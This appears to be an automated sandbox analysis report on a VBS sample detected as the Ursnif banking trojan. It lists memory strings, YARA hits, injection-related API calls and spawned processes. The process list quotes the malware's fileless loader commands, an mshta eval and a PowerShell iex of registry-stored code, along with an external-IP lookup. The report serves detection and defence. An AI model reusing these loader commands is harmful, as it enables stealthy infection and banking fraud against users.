            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
            Source: powershell.exe, 00000018.00000002.951922718.000001B4A76E3000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000018.00000002.951922718.000001B4A76E3000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000018.00000002.951922718.000001B4A76E3000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000018.00000002.926947310.000001B497891000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000018.00000002.951922718.000001B4A76E3000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000002.00000003.882736166.0000000001040000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719373287.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719415680.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.817982563.00000000052EF000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.718993009.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719443986.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.1294500412.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.1296954401.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719331728.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.1311153355.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719519037.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.923726669.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719248205.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.762861604.00000000053ED000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719501128.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719850328.00000000054EB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.1296813994.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5976, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000002.00000003.882736166.0000000001040000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719373287.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719415680.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.817982563.00000000052EF000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.718993009.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719443986.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.1294500412.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.1296954401.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719331728.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.1311153355.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719519037.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.923726669.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719248205.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.762861604.00000000053ED000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719501128.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719850328.00000000054EB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.1296813994.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5976, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)Show sources
            Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

            System Summary:

            barindex
            Source: C:\Windows\explorer.exeCode function: 32_2_04DACCA0 NtReadVirtualMemory,32_2_04DACCA0
            Source: C:\Windows\explorer.exeCode function: 32_2_04DBF560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,32_2_04DBF560
            Source: C:\Windows\explorer.exeCode function: 32_2_04DBAD14 NtQuerySystemInformation,32_2_04DBAD14
            Source: C:\Windows\explorer.exeCode function: 32_2_04DBFFCC NtMapViewOfSection,32_2_04DBFFCC
            Source: C:\Windows\explorer.exeCode function: 32_2_04DC676C NtSetContextThread,NtUnmapViewOfSection,NtClose,32_2_04DC676C
            Source: C:\Windows\explorer.exeCode function: 32_2_04DB387C NtCreateSection,32_2_04DB387C
            Source: C:\Windows\explorer.exeCode function: 32_2_04DB3830 NtWriteVirtualMemory,32_2_04DB3830
            Source: C:\Windows\explorer.exeCode function: 32_2_04DB1AC4 NtQueryInformationProcess,32_2_04DB1AC4
            Source: C:\Windows\explorer.exeCode function: 32_2_04DABAB4 NtAllocateVirtualMemory,32_2_04DABAB4
            Source: C:\Windows\explorer.exeCode function: 32_2_04DA37B832_2_04DA37B8
            Source: C:\Windows\explorer.exeCode function: 32_2_04DCAFB832_2_04DCAFB8
            Source: C:\Windows\explorer.exeCode function: 32_2_04DAB75C32_2_04DAB75C
            Source: C:\Windows\explorer.exeCode function: 32_2_04DBF77032_2_04DBF770
            Source: C:\Windows\explorer.exeCode function: 32_2_04DC676C32_2_04DC676C
            Source: C:\Windows\explorer.exeCode function: 32_2_04DC003432_2_04DC0034
            Source: C:\Windows\explorer.exeCode function: 32_2_04DB913832_2_04DB9138
            Source: C:\Windows\explorer.exeCode function: 32_2_04DAC13432_2_04DAC134
            Source: C:\Windows\explorer.exeCode function: 32_2_04DC74CC32_2_04DC74CC
            Source: C:\Windows\explorer.exeCode function: 32_2_04DB0CC032_2_04DB0CC0
            Source: C:\Windows\explorer.exeCode function: 32_2_04DABCF832_2_04DABCF8
            Source: C:\Windows\explorer.exeCode function: 32_2_04DB3CE032_2_04DB3CE0
            Source: C:\Windows\explorer.exeCode function: 32_2_04DCA4BC32_2_04DCA4BC
            Source: C:\Windows\explorer.exeCode function: 32_2_04DC94B832_2_04DC94B8
            Source: C:\Windows\explorer.exeCode function: 32_2_04DB9CB032_2_04DB9CB0
            Source: C:\Windows\explorer.exeCode function: 32_2_04DBD4A832_2_04DBD4A8
            Source: C:\Windows\explorer.exeCode function: 32_2_04DA547432_2_04DA5474
            Source: C:\Windows\explorer.exeCode function: 32_2_04DAD46032_2_04DAD460
            Source: C:\Windows\explorer.exeCode function: 32_2_04DB1D9432_2_04DB1D94
            Source: C:\Windows\explorer.exeCode function: 32_2_04DCB51632_2_04DCB516
            Source: C:\Windows\explorer.exeCode function: 32_2_04DA6D0832_2_04DA6D08
            Source: C:\Windows\explorer.exeCode function: 32_2_04DB452C32_2_04DB452C
            Source: C:\Windows\explorer.exeCode function: 32_2_04DBB52032_2_04DBB520
            Source: C:\Windows\explorer.exeCode function: 32_2_04DC26B432_2_04DC26B4
            Source: C:\Windows\explorer.exeCode function: 32_2_04DCBEB032_2_04DCBEB0
            Source: C:\Windows\explorer.exeCode function: 32_2_04DAAE0432_2_04DAAE04
            Source: C:\Windows\explorer.exeCode function: 32_2_04DA9F9832_2_04DA9F98
            Source: C:\Windows\explorer.exeCode function: 32_2_04DB17B832_2_04DB17B8
            Source: C:\Windows\explorer.exeCode function: 32_2_04DC20F832_2_04DC20F8
            Source: C:\Windows\explorer.exeCode function: 32_2_04DCE08032_2_04DCE080
            Source: C:\Windows\explorer.exeCode function: 32_2_04DBB04032_2_04DBB040
            Source: C:\Windows\explorer.exeCode function: 32_2_04DC606432_2_04DC6064
            Source: C:\Windows\explorer.exeCode function: 32_2_04DA203C32_2_04DA203C
            Source: C:\Windows\explorer.exeCode function: 32_2_04DC91A032_2_04DC91A0
            Source: C:\Windows\explorer.exeCode function: 32_2_04DCF94032_2_04DCF940
            Source: C:\Windows\explorer.exeCode function: 32_2_04DB117432_2_04DB1174
            Source: C:\Windows\explorer.exeCode function: 32_2_04DC320832_2_04DC3208
            Source: C:\Windows\explorer.exeCode function: 32_2_04DC822432_2_04DC8224
            Source: C:\Windows\explorer.exeCode function: 32_2_04DA2BC832_2_04DA2BC8
            Source: C:\Windows\explorer.exeCode function: 32_2_04DB938032_2_04DB9380
            Source: C:\Windows\explorer.exeCode function: 32_2_04DA8B5C32_2_04DA8B5C
            Source: C:\Windows\explorer.exeCode function: 32_2_04DB8B4C32_2_04DB8B4C
            Source: C:\Windows\explorer.exeCode function: 32_2_04DA732032_2_04DA7320
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\earmark.avchd 66EAF5C2BC2EC2A01D74DB9CC50744C748388CD9B0FA1F07181E639E128803EF
            Source: 0xyZ4rY0opA2.vbsInitial sample: Strings found which are bigger than 50
            Source: iaweong2.dll.28.drStatic PE information: No import functions for PE file found
            Source: xuilsqrn.dll.26.drStatic PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winVBS@32/52@10/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{174A4BA0-2E8C-11EB-90EB-ECF4BBEA1588}.datJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{FE2B0A36-4563-E07B-BF12-491463668D88}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_01
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0xyZ4rY0opA2.vbs'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: 0xyZ4rY0opA2.vbsVirustotal: Detection: 22%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0xyZ4rY0opA2.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6976 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:82952 /prefetch:2
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD10C.tmp' 'c:\Users\user\AppData\Local\Temp\xuilsqrn\CSCD8A4030A3E546C3B2CF916F018EDC0.TMP'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE214.tmp' 'c:\Users\user\AppData\Local\Temp\iaweong2\CSC9F4D0947F3074F27AD7E2B0574F6C6A.TMP'
            Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\8F31.bi1'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6976 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:82952 /prefetch:2Jump to behavior
